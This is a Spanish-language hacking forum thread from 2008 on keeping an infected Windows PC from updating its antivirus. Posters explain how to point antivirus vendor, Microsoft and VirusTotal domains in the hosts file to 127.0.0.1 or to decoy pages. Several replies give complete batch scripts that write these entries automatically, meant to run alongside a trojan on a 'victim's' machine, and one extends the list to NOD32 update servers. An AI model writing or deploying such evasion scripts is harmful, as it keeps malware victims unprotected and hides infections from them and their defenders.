Página 1 de 5

Evitar actualización de Antivirus y páginas de Av online

Publicado: 27 Nov 2008, 18:13
por 1995
Mini Guia para evitar ser detectados una ves infectado un Pc.

¿Qué es el archivo Host?

Código: Seleccionar todo

Es un archivo de texto que contiene direcciones IP y nombres de sitios web relacionados en pares unívocos.
¿Cuál es la Ubicación del archivo host?:
En sistemas Windows 95/98/Me:

Código: Seleccionar todo

C:\Windows
En sistemas Windows NT/2000/2003

Código: Seleccionar todo

C:\Winnt\System32\drivers\etc
En sistemas Windows XP

Código: Seleccionar todo

C:\Windows\System32\drivers\etc
¿Cómo trabaja?

Código: Seleccionar todo

Cuando una máquina se conecta a una red y desde una aplicación hacemos una petición para ver un recurso de red, lo hacemos con el léxico que no es común, es decir, mediante palabras; usamos Nombres de Dominio.

Para la máquina, estos Nombres de Dominio, no tienen mayor sentido, por lo tanto, han de traducirse a algo que puedan entender antes de proveernos con un resultado o respuesta, para hacer esto, recurren a máquinas con listas que relacionan los Nombres de Dominio con sus respectivas direcciones IP.

Esta solicitud, suele ser realizada a unas máquinas específicas que se encuentran en diversas partes del mundo; a su vez, estas máquinas han de responder las solicitudes de cientos o miles de máquinas, lo cual puede resultar un poco complicado. Sin embargo, el sistema cuenta con una herramienta interna y sencilla para evitar estas peticiones, al menos algunas de ellas. Como podrán imaginar, esta herramienta es el archivo hosts.

Hay otras herramientas más poderosas y completas, pero nuevamente, eso queda fuera del alcance de este texto.

Así que el fin principal de este archivo, es descargar de trabajo a los Servidores de Nombres de Dominio y acelerar la obtención de resultados en las máquinas locales al solicitar recursos de red.
Abrir el Archivo Host con el Block de Notas que trae Windows:

Código: Seleccionar todo

# Copyright (c) 1993-1999 Microsoft Corp.
#
# Éste es un ejemplo de archivo HOSTS usado por Microsoft TCP/IP para Windows.
#
# Este archivo contiene las asignaciones de las direcciones IP a los nombres de
# host. Cada entrada debe permanecer en una línea individual. La dirección IP
# debe ponerse en la primera columna, seguida del nombre de host correspondiente.
# La dirección IP y el nombre de host deben separarse con al menos un espacio.
#
#
# También pueden insertarse comentarios (como éste) en líneas individuales
# o a continuación del nombre de equipo indicándolos con el símbolo "#"
#
# Por ejemplo:
#
#      102.54.94.97     rhino.acme.com          # servidor origen
#       38.25.63.10     x.acme.com              # host cliente x

127.0.0.1       localhost

Usando el Archivo Host para Evitar actualización de Antivirus y páginas de Av online

Código: Seleccionar todo

A continuación de la línea 127.0.0.1     Localhost podemos agregar las siguientes:

127.0.0.1 avp.com
127.0.0.1 ca.com
127.0.0.1 customer.symantec.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 download.mcafee.com
127.0.0.1 f-secure.com
127.0.0.1 kaspersky.com
127.0.0.1 kaspersky-labs.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 mast.mcafee.com
127.0.0.1 mcafee.com
127.0.0.1 microsoft.com
127.0.0.1 my-etrust.com
127.0.0.1 nai.com
127.0.0.1 networkassociates.com
127.0.0.1 pandasoftware.com
127.0.0.1 rads.mcafee.com
127.0.0.1 secure.nai.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 sophos.com
127.0.0.1 symantec.com
127.0.0.1 trendmicro.com
127.0.0.1 updates.symantec.com
127.0.0.1 update.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 viruslist.com
127.0.0.1 virustotal.com
127.0.0.1 www.avp.com
127.0.0.1 www.f-secure.com
127.0.0.1 www.grisoft.com
127.0.0.1 www.kaspersky.com
127.0.0.1 www.mcafee.com
127.0.0.1 www.microsoft.com
127.0.0.1 www.moneybookers.com
127.0.0.1 www.my-etrust.com
127.0.0.1 www.nai.com
127.0.0.1 www.networkassociates.com
127.0.0.1 www.pandasoftware.com
127.0.0.1 www.sophos.com
127.0.0.1 www.symantec.com
127.0.0.1 www.trendmicro.com
127.0.0.1 www.virustotal.com

Con esto al intentar ingresar a cualquiera de estas webs mostrará un error la página

Código: Seleccionar todo

No se puede conectar

Firefox no puede establecer una conexión con el servidor en XYZ.


    *   El sitio podría estar no disponible temporalmente o
         demasiado ocupado. Vuelva a intentarlo en unos momentos.

    *   Si no puede cargar ninguna página, compruebe la conexión
         de red de su ordenador.

    *   Si su ordenador o red están protegidos por un cortafuegos
         o proxy, asegúrese de que Firefox tiene permiso para
         acceder a la web.
 


¿El archivo Host solo bloquea las páginas webs en los navegadores?

Código: Seleccionar todo

No, el archivo Host bloquea cualquier acceso relacionado a las páginas, direcciones, ip en cuestión, por ende si un antivirus se actualiza descargando la base de datos desde www.av.com/base/654 solo bastará con agregar al Host: [b]127.0.0.1 www.av.com[/b], para así asegurarnos de su bloqueo

Mostrar errores en las páginas es muy notorio, ¿Qué mas puedo hacer?

Código: Seleccionar todo

Si bloquear las paginas es muy notorio lo que se puede hacer es redirigir a otra, mediante el siguiente ejemplo
200.10.226.218 [Enlace externo eliminado para invitados]

Si ingresas 200.10.226.218 en tu navegador te mostrará la web de Google, si agregas la linea en cuestión al archivo Host al intentar entrar a [Enlace externo eliminado para invitados] nos llevará a la pagina de Google.

¿Cómo obtener la IP de una página web?

Mediante la consola de Windows, es decir, en Inicio -> Ejecutar -> escribir "cmd" (sin las comillas) y dar enter:

Abrirá la consola de windows, luego allí ingresamos el siguiente comando:

Código: Seleccionar todo

ping www.google.com
y veremos el siguiente resultado:

Código: Seleccionar todo

C:\Documents and Settings\1995>ping www.google.com

Haciendo ping a www.l.google.com [[b]200.10.226.218[/b]] con 32 bytes de datos:

Respuesta desde 200.10.226.218: bytes=32 tiempo=21ms TTL=58
Respuesta desde 200.10.226.218: bytes=32 tiempo=19ms TTL=58

Estadísticas de ping para 200.10.226.218:
    Paquetes: enviados = 2, recibidos = 2, perdidos = 0
    (0% perdidos),
Tiempos aproximados de ida y vuelta en milisegundos:
    Mínimo = 19ms, Máximo = 21ms, Media = 20ms

Como verán la IP de Google.com es 200.10.226.218


El resto es solo parte de su imaginación, como por ejemplo crear una página web en blanco que contenga un error diciendo por ejemplo "Página en construcción, disculpe las molestias, etc" y redirigir hacia ella con esto levantaríamos menos sospechas.

Si deseas compartir ideas, scripts, etc usa el mismo tema.


Saludos

Código: Seleccionar todo

Una buena idea podría ser crear un .Bat que agrege estás lineas automaticamente al archivo Host al ejecutar el troyano

Publicado: 27 Nov 2008, 22:45
por b#
1995 escribió:Una buena idea podría ser crear un .Bat que agrege estás lineas automaticamente al archivo Host al ejecutar el troyano
Acá dejo el código del .Bat para Windows XP:

Código: Seleccionar todo

@echo off
set hosts=%windir%\System32\drivers\etc\hosts
echo. >> %hosts%
echo 127.0.0.1 avp.com >> %hosts%
echo 127.0.0.1 ca.com >> %hosts%
echo 127.0.0.1 customer.symantec.com >> %hosts%
echo 127.0.0.1 dispatch.mcafee.com >> %hosts%
echo 127.0.0.1 download.mcafee.com >> %hosts%
echo 127.0.0.1 f-secure.com >> %hosts%
echo 127.0.0.1 kaspersky.com >> %hosts%
echo 127.0.0.1 kaspersky-labs.com >> %hosts%
echo 127.0.0.1 liveupdate.symantec.com >> %hosts%
echo 127.0.0.1 liveupdate.symantecliveupdate.com >> %hosts%
echo 127.0.0.1 mast.mcafee.com >> %hosts%
echo 127.0.0.1 mcafee.com >> %hosts%
echo 127.0.0.1 microsoft.com >> %hosts%
echo 127.0.0.1 my-etrust.com >> %hosts%
echo 127.0.0.1 nai.com >> %hosts%
echo 127.0.0.1 networkassociates.com >> %hosts%
echo 127.0.0.1 pandasoftware.com >> %hosts%
echo 127.0.0.1 rads.mcafee.com >> %hosts%
echo 127.0.0.1 secure.nai.com >> %hosts%
echo 127.0.0.1 securityresponse.symantec.com >> %hosts%
echo 127.0.0.1 sophos.com >> %hosts%
echo 127.0.0.1 symantec.com >> %hosts%
echo 127.0.0.1 trendmicro.com >> %hosts%
echo 127.0.0.1 updates.symantec.com >> %hosts%
echo 127.0.0.1 update.symantec.com >> %hosts%
echo 127.0.0.1 us.mcafee.com >> %hosts%
echo 127.0.0.1 viruslist.com >> %hosts%
echo 127.0.0.1 virustotal.com >> %hosts%
echo 127.0.0.1 www.avp.com >> %hosts%
echo 127.0.0.1 www.f-secure.com >> %hosts%
echo 127.0.0.1 www.grisoft.com >> %hosts%
echo 127.0.0.1 www.kaspersky.com >> %hosts%
echo 127.0.0.1 www.mcafee.com >> %hosts%
echo 127.0.0.1 www.microsoft.com >> %hosts%
echo 127.0.0.1 www.moneybookers.com >> %hosts%
echo 127.0.0.1 www.my-etrust.com >> %hosts%
echo 127.0.0.1 www.nai.com >> %hosts%
echo 127.0.0.1 www.networkassociates.com >> %hosts%
echo 127.0.0.1 www.pandasoftware.com >> %hosts%
echo 127.0.0.1 www.sophos.com >> %hosts%
echo 127.0.0.1 www.symantec.com >> %hosts%
echo 127.0.0.1 www.trendmicro.com >> %hosts%
echo 127.0.0.1 www.virustotal.com >> %hosts%
Saludos.

Re: Evitar actualización de Antivirus y páginas de Av online

Publicado: 27 Nov 2008, 22:52
por HypNosS
Vos sabes que nunca pude hacer funcionar ese metodo :(

Sin duda, bien aplicado, es una herramienta que abre muchas puertas ;)

Re:

Publicado: 27 Nov 2008, 23:47
por 1995
b#

Exactamente lo que tenía en mente

Muchas gracias b#

Publicado: 28 Nov 2008, 00:02
por b#
Le agregué una opción para elejir la versión de Windows:

Código: Seleccionar todo

@Echo OFF
:Inicio
Echo Sistema operativo:
Echo.
Echo 1. Windows 95/98/Me
Echo 2. Windows NT/2000
Echo 3. Windows XP
Echo 4. Windows 2003
Echo 5. Windows Vista
Echo.
Echo 6. Salir
Set /p OP=
If %OP%==1 CLS&&Set Hosts=\Windows\hosts&&GoTo Hosts
If %OP%==2 CLS&&Set Hosts=\WINNT\System32\drivers\etc\hosts&&GoTo Hosts
If %OP%==3 CLS&&Set Hosts=\WINDOWS\system32\drivers\etc\hosts&&GoTo Hosts
If %OP%==4 CLS&&Set Hosts=\WINDOWS\system32\drivers\etc\hosts&&GoTo Hosts
If %OP%==5 CLS&&Set Hosts=\WINDOWS\system32\drivers\etc\hosts&&GoTo Hosts
If %OP%==6 Exit
:Hosts
Echo. >> %Hosts%
Echo 127.0.0.1 avp.com >> %Hosts%
Echo 127.0.0.1 ca.com >> %Hosts%
Echo 127.0.0.1 customer.symantec.com >> %Hosts%
Echo 127.0.0.1 dispatch.mcafee.com >> %Hosts%
Echo 127.0.0.1 download.mcafee.com >> %Hosts%
Echo 127.0.0.1 f-secure.com >> %Hosts%
Echo 127.0.0.1 kaspersky.com >> %Hosts%
Echo 127.0.0.1 kaspersky-labs.com >> %Hosts%
Echo 127.0.0.1 liveupdate.symantec.com >> %Hosts%
Echo 127.0.0.1 liveupdate.symantecliveupdate.com >> %Hosts%
Echo 127.0.0.1 mast.mcafee.com >> %Hosts%
Echo 127.0.0.1 mcafee.com >> %Hosts%
Echo 127.0.0.1 microsoft.com >> %Hosts%
Echo 127.0.0.1 my-etrust.com >> %Hosts%
Echo 127.0.0.1 nai.com >> %Hosts%
Echo 127.0.0.1 networkassociates.com >> %Hosts%
Echo 127.0.0.1 pandasoftware.com >> %Hosts%
Echo 127.0.0.1 rads.mcafee.com >> %Hosts%
Echo 127.0.0.1 secure.nai.com >> %Hosts%
Echo 127.0.0.1 securityresponse.symantec.com >> %Hosts%
Echo 127.0.0.1 sophos.com >> %Hosts%
Echo 127.0.0.1 symantec.com >> %Hosts%
Echo 127.0.0.1 trendmicro.com >> %Hosts%
Echo 127.0.0.1 updates.symantec.com >> %Hosts%
Echo 127.0.0.1 update.symantec.com >> %Hosts%
Echo 127.0.0.1 us.mcafee.com >> %Hosts%
Echo 127.0.0.1 viruslist.com >> %Hosts%
Echo 127.0.0.1 virustotal.com >> %Hosts%
Echo 127.0.0.1 www.avp.com >> %Hosts%
Echo 127.0.0.1 www.f-secure.com >> %Hosts%
Echo 127.0.0.1 www.grisoft.com >> %Hosts%
Echo 127.0.0.1 www.kaspersky.com >> %Hosts%
Echo 127.0.0.1 www.mcafee.com >> %Hosts%
Echo 127.0.0.1 www.microsoft.com >> %Hosts%
Echo 127.0.0.1 www.moneybookers.com >> %Hosts%
Echo 127.0.0.1 www.my-etrust.com >> %Hosts%
Echo 127.0.0.1 www.nai.com >> %Hosts%
Echo 127.0.0.1 www.networkassociates.com >> %Hosts%
Echo 127.0.0.1 www.pandasoftware.com >> %Hosts%
Echo 127.0.0.1 www.sophos.com >> %Hosts%
Echo 127.0.0.1 www.symantec.com >> %Hosts%
Echo 127.0.0.1 www.trendmicro.com >> %Hosts%
Echo 127.0.0.1 www.virustotal.com >> %Hosts%
Echo Listo!
Echo.
Echo 1. Inicio
Echo 2. Salir
Set /p IS=
If %IS%==1 GoTo Inicio
If %IS%==2 Exit
Saludos.

Re: Evitar actualización de Antivirus y páginas de Av online

Publicado: 28 Nov 2008, 07:58
por rodolfocde
hola muchas gracias x el tuto
tengo una pregunta
ese .bat le enviamos a nuestra victima y lo ejecutamos en su pc y ahi que pasa?

Re: Evitar actualización de Antivirus y páginas de Av online

Publicado: 28 Nov 2008, 15:29
por 1995
rodolfocde escribió:hola muchas gracias x el tuto
tengo una pregunta
ese .bat le enviamos a nuestra victima y lo ejecutamos en su pc y ahi que pasa?
Hola, lo que sucede al abrir el Bat, es agregar al Host las líneas escritas, por lo que nos ahorramos tiempo y trabajo en hacer lo que expliqué arriba.

Saludos

Re: Evitar actualización de Antivirus y páginas de Av online

Publicado: 28 Nov 2008, 21:28
por jogsx2
Voy a probar...muchas gracias!!!

Re: Evitar actualización de Antivirus y páginas de Av online

Publicado: 28 Nov 2008, 22:06
por boludopeligroso
buenisimo!!!!

veremos que resultados da, si todo anda bien seguro que los mejores

Gracias!

Re: Evitar actualización de Antivirus y páginas de Av online

Publicado: 29 Nov 2008, 05:37
por K-0Z
cual de todas esas paginas es la del nod32?

Publicado: 29 Nov 2008, 06:06
por b#
Creo que no está, pero en [Enlace externo eliminado para invitados] aparecen los Update Servers.

Re:

Publicado: 07 Dic 2008, 21:12
por gatok47
b# escribió:Creo que no está, pero en [Enlace externo eliminado para invitados] aparecen los Update Servers.
Compa quedaria asi para dejar inservible el Nod32 fijad hasta el final los server de nod32

Código: Seleccionar todo

@echo off
set hosts=%windir%\System32\drivers\etc\hosts
echo. >> %hosts%
echo 127.0.0.1 avp.com >> %hosts%
echo 127.0.0.1 ca.com >> %hosts%
echo 127.0.0.1 customer.symantec.com >> %hosts%
echo 127.0.0.1 dispatch.mcafee.com >> %hosts%
echo 127.0.0.1 download.mcafee.com >> %hosts%
echo 127.0.0.1 f-secure.com >> %hosts%
echo 127.0.0.1 kaspersky.com >> %hosts%
echo 127.0.0.1 kaspersky-labs.com >> %hosts%
echo 127.0.0.1 liveupdate.symantec.com >> %hosts%
echo 127.0.0.1 liveupdate.symantecliveupdate.com >> %hosts%
echo 127.0.0.1 mast.mcafee.com >> %hosts%
echo 127.0.0.1 mcafee.com >> %hosts%
echo 127.0.0.1 microsoft.com >> %hosts%
echo 127.0.0.1 my-etrust.com >> %hosts%
echo 127.0.0.1 nai.com >> %hosts%
echo 127.0.0.1 networkassociates.com >> %hosts%
echo 127.0.0.1 pandasoftware.com >> %hosts%
echo 127.0.0.1 rads.mcafee.com >> %hosts%
echo 127.0.0.1 secure.nai.com >> %hosts%
echo 127.0.0.1 securityresponse.symantec.com >> %hosts%
echo 127.0.0.1 sophos.com >> %hosts%
echo 127.0.0.1 symantec.com >> %hosts%
echo 127.0.0.1 trendmicro.com >> %hosts%
echo 127.0.0.1 updates.symantec.com >> %hosts%
echo 127.0.0.1 update.symantec.com >> %hosts%
echo 127.0.0.1 us.mcafee.com >> %hosts%
echo 127.0.0.1 viruslist.com >> %hosts%
echo 127.0.0.1 virustotal.com >> %hosts%
echo 127.0.0.1 www.avp.com >> %hosts%
echo 127.0.0.1 www.f-secure.com >> %hosts%
echo 127.0.0.1 www.grisoft.com >> %hosts%
echo 127.0.0.1 www.kaspersky.com >> %hosts%
echo 127.0.0.1 www.mcafee.com >> %hosts%
echo 127.0.0.1 www.microsoft.com >> %hosts%
echo 127.0.0.1 www.moneybookers.com >> %hosts%
echo 127.0.0.1 www.my-etrust.com >> %hosts%
echo 127.0.0.1 www.nai.com >> %hosts%
echo 127.0.0.1 www.networkassociates.com >> %hosts%
echo 127.0.0.1 www.pandasoftware.com >> %hosts%
echo 127.0.0.1 www.sophos.com >> %hosts%
echo 127.0.0.1 www.symantec.com >> %hosts%
echo 127.0.0.1 www.trendmicro.com >> %hosts%
echo 127.0.0.1 www.virustotal.com >> %hosts%
echo 127.0.0.1 u20.eset.com >> %hosts%
echo 127.0.0.1 u21.eset.com >> %hosts%
echo 127.0.0.1 u22.eset.com >> %hosts%
echo 127.0.0.1 u23.eset.com >> %hosts%
echo 127.0.0.1 u24.eset.com >> %hosts%
echo 127.0.0.1 89.202.157.135 >> %hosts%
echo 127.0.0.1 89.202.157.136 >> %hosts%
echo 127.0.0.1 89.202.157.137 >> %hosts%
echo 127.0.0.1 89.202.157.138 >> %hosts%
echo 127.0.0.1 89.202.157.139 >> %hosts%
echo 127.0.0.1 u30.eset.com >> %hosts%
echo 127.0.0.1 u31.eset.com >> %hosts%
echo 127.0.0.1 u32.eset.com >> %hosts%
echo 127.0.0.1 u33.eset.com >> %hosts%
echo 127.0.0.1 u34.eset.com >> %hosts%
echo 127.0.0.1 u35.eset.com >> %hosts%
echo 127.0.0.1 u36.eset.com >> %hosts%
echo 127.0.0.1 u37.eset.com >> %hosts%
echo 127.0.0.1 u38.eset.com >> %hosts%
echo 127.0.0.1 u39.eset.com >> %hosts%
echo 127.0.0.1 u40.eset.com >> %hosts%
echo 127.0.0.1 u41.eset.com >> %hosts%
echo 127.0.0.1 u42.eset.com >> %hosts%
echo 127.0.0.1 u43.eset.com >> %hosts%
echo 127.0.0.1 u44.eset.com >> %hosts%
echo 127.0.0.1 u45.eset.com >> %hosts%
echo 127.0.0.1 u46.eset.com >> %hosts%
echo 127.0.0.1 u47.eset.com >> %hosts%
echo 127.0.0.1 u48.eset.com >> %hosts%
echo 127.0.0.1 u49.eset.com >> %hosts%
Saludos

Publicado: 07 Dic 2008, 21:18
por b#
Muy bien gatok47, recuerda que no deja inservible al Nod32, sino que no deja actualizarlo.

Saludos.

Re: Evitar actualización de Antivirus y páginas de Av online

Publicado: 18 Dic 2008, 04:34
por l0ko
Buenas

Gracias por la aportación me gusto mucho! qué suerte que el XP y el Vista usen la misma dirección host :D

Por cierto : gatok47
gatok47 escribió:

Código: Seleccionar todo

@echo off
set hosts=%windir%\System32\drivers\etc\hosts
echo. >> %hosts%
echo 127.0.0.1 avp.com >> %hosts%
echo 127.0.0.1 ca.com >> %hosts%
echo 127.0.0.1 customer.symantec.com >> %hosts%
echo 127.0.0.1 dispatch.mcafee.com >> %hosts%
echo 127.0.0.1 download.mcafee.com >> %hosts%
echo 127.0.0.1 f-secure.com >> %hosts%
echo 127.0.0.1 kaspersky.com >> %hosts%
echo 127.0.0.1 kaspersky-labs.com >> %hosts%
echo 127.0.0.1 liveupdate.symantec.com >> %hosts%
echo 127.0.0.1 liveupdate.symantecliveupdate.com >> %hosts%
echo 127.0.0.1 mast.mcafee.com >> %hosts%
echo 127.0.0.1 mcafee.com >> %hosts%
echo 127.0.0.1 microsoft.com >> %hosts%
echo 127.0.0.1 my-etrust.com >> %hosts%
echo 127.0.0.1 nai.com >> %hosts%
echo 127.0.0.1 networkassociates.com >> %hosts%
echo 127.0.0.1 pandasoftware.com >> %hosts%
echo 127.0.0.1 rads.mcafee.com >> %hosts%
echo 127.0.0.1 secure.nai.com >> %hosts%
echo 127.0.0.1 securityresponse.symantec.com >> %hosts%
echo 127.0.0.1 sophos.com >> %hosts%
echo 127.0.0.1 symantec.com >> %hosts%
echo 127.0.0.1 trendmicro.com >> %hosts%
echo 127.0.0.1 updates.symantec.com >> %hosts%
echo 127.0.0.1 update.symantec.com >> %hosts%
echo 127.0.0.1 us.mcafee.com >> %hosts%
echo 127.0.0.1 viruslist.com >> %hosts%
echo 127.0.0.1 virustotal.com >> %hosts%
echo 127.0.0.1 www.avp.com >> %hosts%
echo 127.0.0.1 www.f-secure.com >> %hosts%
echo 127.0.0.1 www.grisoft.com >> %hosts%
echo 127.0.0.1 www.kaspersky.com >> %hosts%
echo 127.0.0.1 www.mcafee.com >> %hosts%
echo 127.0.0.1 www.microsoft.com >> %hosts%
echo 127.0.0.1 www.moneybookers.com >> %hosts%
echo 127.0.0.1 www.my-etrust.com >> %hosts%
echo 127.0.0.1 www.nai.com >> %hosts%
echo 127.0.0.1 www.networkassociates.com >> %hosts%
echo 127.0.0.1 www.pandasoftware.com >> %hosts%
echo 127.0.0.1 www.sophos.com >> %hosts%
echo 127.0.0.1 www.symantec.com >> %hosts%
echo 127.0.0.1 www.trendmicro.com >> %hosts%
echo 127.0.0.1 www.virustotal.com >> %hosts%
echo 127.0.0.1 u20.eset.com >> %hosts%
echo 127.0.0.1 u21.eset.com >> %hosts%
echo 127.0.0.1 u22.eset.com >> %hosts%
echo 127.0.0.1 u23.eset.com >> %hosts%
echo 127.0.0.1 u24.eset.com >> %hosts%
echo 127.0.0.1 89.202.157.135 >> %hosts%
echo 127.0.0.1 89.202.157.136 >> %hosts%
echo 127.0.0.1 89.202.157.137 >> %hosts%
echo 127.0.0.1 89.202.157.138 >> %hosts%
echo 127.0.0.1 89.202.157.139 >> %hosts%
echo 127.0.0.1 u30.eset.com >> %hosts%
echo 127.0.0.1 u31.eset.com >> %hosts%
echo 127.0.0.1 u32.eset.com >> %hosts%
echo 127.0.0.1 u33.eset.com >> %hosts%
echo 127.0.0.1 u34.eset.com >> %hosts%
echo 127.0.0.1 u35.eset.com >> %hosts%
echo 127.0.0.1 u36.eset.com >> %hosts%
echo 127.0.0.1 u37.eset.com >> %hosts%
echo 127.0.0.1 u38.eset.com >> %hosts%
echo 127.0.0.1 u39.eset.com >> %hosts%
echo 127.0.0.1 u40.eset.com >> %hosts%
echo 127.0.0.1 u41.eset.com >> %hosts%
echo 127.0.0.1 u42.eset.com >> %hosts%
echo 127.0.0.1 u43.eset.com >> %hosts%
echo 127.0.0.1 u44.eset.com >> %hosts%
echo 127.0.0.1 u45.eset.com >> %hosts%
echo 127.0.0.1 u46.eset.com >> %hosts%
echo 127.0.0.1 u47.eset.com >> %hosts%
echo 127.0.0.1 u48.eset.com >> %hosts%
echo 127.0.0.1 u49.eset.com >> %hosts%
Saludos
Tu agregaste todos los Update Servers de el NoD32 pero el resto de Av’S tienen más Update Servers ¿?
No podrán así actualizarse o poniendo simplemente la web como esta puesta evitas que la web los redirecciones a otro Update Servers ¿?

Saludos

Re: Evitar actualización de Antivirus y páginas de Av online

Publicado: 18 Dic 2008, 06:33
por gatok47
l0ko escribió:Buenas

Gracias por la aportación me gusto mucho! qué suerte que el XP y el Vista usen la misma dirección host :D

Por cierto : gatok47
gatok47 escribió:

Código: Seleccionar todo

@echo off
set hosts=%windir%\System32\drivers\etc\hosts
echo. >> %hosts%
echo 127.0.0.1 avp.com >> %hosts%
echo 127.0.0.1 ca.com >> %hosts%
echo 127.0.0.1 customer.symantec.com >> %hosts%
echo 127.0.0.1 dispatch.mcafee.com >> %hosts%
echo 127.0.0.1 download.mcafee.com >> %hosts%
echo 127.0.0.1 f-secure.com >> %hosts%
echo 127.0.0.1 kaspersky.com >> %hosts%
echo 127.0.0.1 kaspersky-labs.com >> %hosts%
echo 127.0.0.1 liveupdate.symantec.com >> %hosts%
echo 127.0.0.1 liveupdate.symantecliveupdate.com >> %hosts%
echo 127.0.0.1 mast.mcafee.com >> %hosts%
echo 127.0.0.1 mcafee.com >> %hosts%
echo 127.0.0.1 microsoft.com >> %hosts%
echo 127.0.0.1 my-etrust.com >> %hosts%
echo 127.0.0.1 nai.com >> %hosts%
echo 127.0.0.1 networkassociates.com >> %hosts%
echo 127.0.0.1 pandasoftware.com >> %hosts%
echo 127.0.0.1 rads.mcafee.com >> %hosts%
echo 127.0.0.1 secure.nai.com >> %hosts%
echo 127.0.0.1 securityresponse.symantec.com >> %hosts%
echo 127.0.0.1 sophos.com >> %hosts%
echo 127.0.0.1 symantec.com >> %hosts%
echo 127.0.0.1 trendmicro.com >> %hosts%
echo 127.0.0.1 updates.symantec.com >> %hosts%
echo 127.0.0.1 update.symantec.com >> %hosts%
echo 127.0.0.1 us.mcafee.com >> %hosts%
echo 127.0.0.1 viruslist.com >> %hosts%
echo 127.0.0.1 virustotal.com >> %hosts%
echo 127.0.0.1 www.avp.com >> %hosts%
echo 127.0.0.1 www.f-secure.com >> %hosts%
echo 127.0.0.1 www.grisoft.com >> %hosts%
echo 127.0.0.1 www.kaspersky.com >> %hosts%
echo 127.0.0.1 www.mcafee.com >> %hosts%
echo 127.0.0.1 www.microsoft.com >> %hosts%
echo 127.0.0.1 www.moneybookers.com >> %hosts%
echo 127.0.0.1 www.my-etrust.com >> %hosts%
echo 127.0.0.1 www.nai.com >> %hosts%
echo 127.0.0.1 www.networkassociates.com >> %hosts%
echo 127.0.0.1 www.pandasoftware.com >> %hosts%
echo 127.0.0.1 www.sophos.com >> %hosts%
echo 127.0.0.1 www.symantec.com >> %hosts%
echo 127.0.0.1 www.trendmicro.com >> %hosts%
echo 127.0.0.1 www.virustotal.com >> %hosts%
echo 127.0.0.1 u20.eset.com >> %hosts%
echo 127.0.0.1 u21.eset.com >> %hosts%
echo 127.0.0.1 u22.eset.com >> %hosts%
echo 127.0.0.1 u23.eset.com >> %hosts%
echo 127.0.0.1 u24.eset.com >> %hosts%
echo 127.0.0.1 89.202.157.135 >> %hosts%
echo 127.0.0.1 89.202.157.136 >> %hosts%
echo 127.0.0.1 89.202.157.137 >> %hosts%
echo 127.0.0.1 89.202.157.138 >> %hosts%
echo 127.0.0.1 89.202.157.139 >> %hosts%
echo 127.0.0.1 u30.eset.com >> %hosts%
echo 127.0.0.1 u31.eset.com >> %hosts%
echo 127.0.0.1 u32.eset.com >> %hosts%
echo 127.0.0.1 u33.eset.com >> %hosts%
echo 127.0.0.1 u34.eset.com >> %hosts%
echo 127.0.0.1 u35.eset.com >> %hosts%
echo 127.0.0.1 u36.eset.com >> %hosts%
echo 127.0.0.1 u37.eset.com >> %hosts%
echo 127.0.0.1 u38.eset.com >> %hosts%
echo 127.0.0.1 u39.eset.com >> %hosts%
echo 127.0.0.1 u40.eset.com >> %hosts%
echo 127.0.0.1 u41.eset.com >> %hosts%
echo 127.0.0.1 u42.eset.com >> %hosts%
echo 127.0.0.1 u43.eset.com >> %hosts%
echo 127.0.0.1 u44.eset.com >> %hosts%
echo 127.0.0.1 u45.eset.com >> %hosts%
echo 127.0.0.1 u46.eset.com >> %hosts%
echo 127.0.0.1 u47.eset.com >> %hosts%
echo 127.0.0.1 u48.eset.com >> %hosts%
echo 127.0.0.1 u49.eset.com >> %hosts%
Saludos
Tu agregaste todos los Update Servers de el NoD32 pero el resto de Av’S tienen más Update Servers ¿?
No podrán así actualizarse o poniendo simplemente la web como esta puesta evitas que la web los redirecciones a otro Update Servers ¿?

Saludos
Con esto almenos el NOD32 no se actualizara mas, abra que buscar los demas servidores de los demas antivirus, ojala lo vayamos agrandando el code, en estos dias le agregare otros servidores de actualizacion de los AV